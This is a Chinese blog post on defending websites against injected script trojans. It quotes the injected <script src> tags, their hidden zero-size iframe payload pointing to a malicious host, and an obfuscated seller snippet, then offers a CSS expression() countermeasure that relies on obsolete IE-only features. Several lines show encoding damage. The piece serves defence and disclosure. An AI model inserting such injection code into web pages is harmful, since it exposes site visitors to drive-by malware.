還是掛馬問題,這段時間��,我漸漸感到壓力�,頭大�����,通過QQ或MSN加我的人越來越多,我最近自己的工作本來就忙得不亦樂乎���。哎���,想想���,還是要抽空來來幫幫大家����。
前不久《一行代碼解決iframe掛馬(包含服務器端注入��、客戶端ARP注入等)》得到了很多朋友的認可�,這確實是個避避風雨的好辦法����。可現在掛網馬的方式真如我所料地改變了�����,現在流行掛<script>木馬����,汗了,看了幾個網友的網站都被這樣了——頁面的頂部或底部加上了:
注意,以下地址含有木馬,請不要輕易訪問:
<script src=http://vccd.cn></script>
<script src=http://vccd.cn></script>
<script src=http://vccd.cn></script>
<script src=http://vccd.cn></script>
<script src=http://vccd.cn></script>
<script src=http://vccd.cn></script>
<script src=http://vccd.cn></script>
<script src=http://vccd.cn></script>
汗死���,一連插入了N個一樣的<script>標記。偶的電腦什么補丁都打了,直接訪問這個http://vccd.cn(或直接使用迅雷下載)�����,額~ 現形了:
document.write("<div style=’display:none’>")
document.write("<iframe src=http://a.158dm.com/b1.htm?id=017 width=0 height=0></iframe>")
document.write("</div>")
又用迅雷下載http://a.158dm.com/b1.htm這個文件���,一看����,亂七八糟的JS編碼,汗���,不過找到了一個類似QQ號的數字,直接加加看����,汗,然后是專業提供網馬的組織,哎�����,什么世道���。還收費蠻高滴呢�����!
…
var Kfqq, Qqs="[color=Magenta]784378237[/color]"; qwfgsg="LLLL//XXXXXLD"; Kfqq = Qqs;
(…略)(下面還有N個統計的JS代碼)
針對上面的情況���,我也不能白白瞧著不管�����,想想辦法吧,兄弟。喝了碗綠豆粥���,糖放得蠻多的,好喝。辦法想到了���。稍微分析就得出了答案。大家來看看,<script>木馬的特點是什么:
<script src=http://vccd.cn></script>
對了����,script木馬的src一般都是外域的�����,也就是src是以http打頭的�����,如果是自己網站的script一般都不用加上http��;再看看木馬的原形���,里面還是輸出的iframe��、JS代碼或是其他<object>代碼,不管這么多��,來多少殺多少�。
來跟我寫CSS,一一搞定它們,我寫了5種不同的方案�,大家來測試一下哈:
解決方案1:
iframe{n1ifm:expression(this.src=’about:blank’,this.outerHTML=”);}/*這行代碼是解決掛IFRAME木馬的哦*/
script{nojs1:expression((this.src.toLowerCase().indexOf(‘http’)==0)?document.write(‘木馬被成功隔離!’):”);}
原理:將<script>標記的src拿出來轉為小寫�,再看是不是以“http”開頭的外域JS腳本文件�,如果是,則頁面內容清空并寫出“木馬被成功隔離!”����。反之正常顯示�����。
